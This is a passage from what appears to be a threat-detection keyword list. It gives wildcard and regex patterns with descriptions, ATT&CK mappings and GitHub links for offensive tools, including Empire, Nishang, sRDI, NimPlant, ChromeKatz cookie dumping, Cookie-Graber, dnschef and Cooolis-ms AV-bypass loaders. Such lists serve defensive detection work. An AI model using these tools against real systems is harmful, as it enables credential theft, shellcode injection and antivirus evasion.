Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*ConvertTo-Shellcode -*",".{0,1000}ConvertTo\-Shellcode\s\-.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*ConvertToShellcode*",".{0,1000}ConvertToShellcode.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*ConvertTo-Shellcode.*",".{0,1000}ConvertTo\-Shellcode\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. 
Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*ConvertTo-Shellcode.ps1*",".{0,1000}ConvertTo\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*cookie_graber_x64.o*",".{0,1000}cookie_graber_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cookie-graber.c*",".{0,1000}cookie\-graber\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cookie-graber_x64.exe*",".{0,1000}cookie\-graber_x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*Cookie-Graber-BOF*",".{0,1000}Cookie\-Graber\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cookie-katz edge *",".{0,1000}cookie\-katz\sedge\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential
Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cookie-katz webview *",".{0,1000}cookie\-katz\swebview\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatz.exe*",".{0,1000}CookieKatz\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzBOF.cpp*",".{0,1000}CookieKatzBOF\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzBOF.x64*",".{0,1000}CookieKatzBOF\.x64.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzBOF.zip*",".{0,1000}CookieKatzBOF\.zip.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzMinidump.exe*",".{0,1000}CookieKatzMinidump\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process 
memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieProcessor.exe*",".{0,1000}CookieProcessor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cooking A replies to point to * matching: *",".{0,1000}cooking\sA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking AAAA replies to point to * matching: *",".{0,1000}cooking\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all A replies to point to *",".{0,1000}cooking\sall\sA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all AAAA replies to point to *",".{0,1000}cooking\sall\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all CNAME replies to point to *",".{0,1000}cooking\sall\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all MX replies to point to *",".{0,1000}cooking\sall\sMX\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all NS replies to point to *",".{0,1000}cooking\sall\sNS\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking CNAME replies to point to * matching: *",".{0,1000}cooking\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking MX replies to point to * matching: *",".{0,1000}cooking\sMX\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking NS replies to point to * matching: *",".{0,1000}cooking\sNS\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cool*/cool.zip*",".{0,1000}cool.{0,1000}\/cool\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*CoolerVoid/0d1n*",".{0,1000}CoolerVoid\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*coolv0.1.exe*",".{0,1000}coolv0\.1\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*Cooolis*shellcode*",".{0,1000}Cooolis.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CooolisAdjustTokenPrivileges*",".{0,1000}CooolisAdjustTokenPrivileges.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CooolisCreateRemoteThread*",".{0,1000}CooolisCreateRemoteThread.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-ExternalC2*",".{0,1000}Cooolis\-ExternalC2.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-ms.exe*",".{0,1000}Cooolis\-ms\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-msf*",".{0,1000}Cooolis\-msf.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-msX64.zip*",".{0,1000}Cooolis\-msX64\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
